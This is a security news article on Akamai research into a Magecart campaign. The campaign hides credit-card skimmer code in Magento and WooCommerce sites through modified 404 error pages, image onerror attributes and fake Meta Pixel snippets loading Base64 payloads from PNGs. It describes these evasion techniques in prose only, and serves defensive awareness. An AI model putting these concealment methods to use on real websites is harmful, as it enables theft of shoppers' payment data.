In what has been called the most recent phase of the assaults, a sophisticated Magecart effort has been seen modifying websites’ default 404 error page to disguise malicious code.
According to Akamai, the activity targets Magento and WooCommerce websites, with some of the victims being significant companies in the food and retail sectors.
According to a Monday investigation by Akamai security researcher Roman Lvovsky, “in this campaign, all the victim websites we detected were directly exploited, as the malicious code snippet was injected into one of their first-party resources.”
In order to do this, the code must be included either directly into the HTML pages or inside a first-party script that was loaded with the website.
The assaults are carried out through a multi-stage chain, where the loader code receives the primary payload during runtime in order to intercept and exfiltrate the private data submitted by site users on checkout pages.
“The purpose of separating the attack into three parts is to conceal the attack in a way that makes it more challenging to detect,” Lvovsky said. “This makes the attack more discreet and more difficult to detect by security services and external scanning tools that might be in place on the targeted website.”
“This allows for the activation of the full flow of the attack only on the specifically targeted pages; that is, because of the obfuscation measures used by the attacker, the activation of the full attack flow can only occur where the attacker intended for it to execute.”
One of the three campaign types involves the usage of 404 error pages. The other two hide the skimmer code in a faulty HTML image tag’s onerror attribute and as an inline script that looks like a Meta Pixel code snippet.
A PNG image with a Base64-encoded string appended to the end of the image binary file, which, when decoded, represents a segment of JavaScript code that connects to an actor-controlled domain to retrieve the second stage payload, is what the phony Meta Pixel code retrieves from the website’s own directory.
“This code is responsible for carrying out various malicious activities on the targeted sensitive page, with the goals of reading the user’s sensitive personal and credit card data and transmitting it back to the skimmer’s C2 server,” Lvovsky stated.
Both of these methods are made to get beyond security controls like static analysis and external scanning, which effectively lengthens the attack chain.
The third loader option, on the other hand, stands out due to its novel concealing method, which makes use of the website’s default error pages. It sends a GET request to a website’s non-existent URL, resulting in a “404 Not Found” return, and appears as either an inline script or phony Meta Pixel code.
This answer directs the user to a modified error page that conceals the skimmer code. The way the skimmer operates is by placing a fake payment form over checkout pages to collect data for later exfiltration as a Base64-encoded string.
“The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion,” Lvovsky stated.
“The request to the first-party path leading to the 404 page is another evasion technique that can bypass Content Security Policy headers and other security measures that may be actively analyzing network requests on the page.”
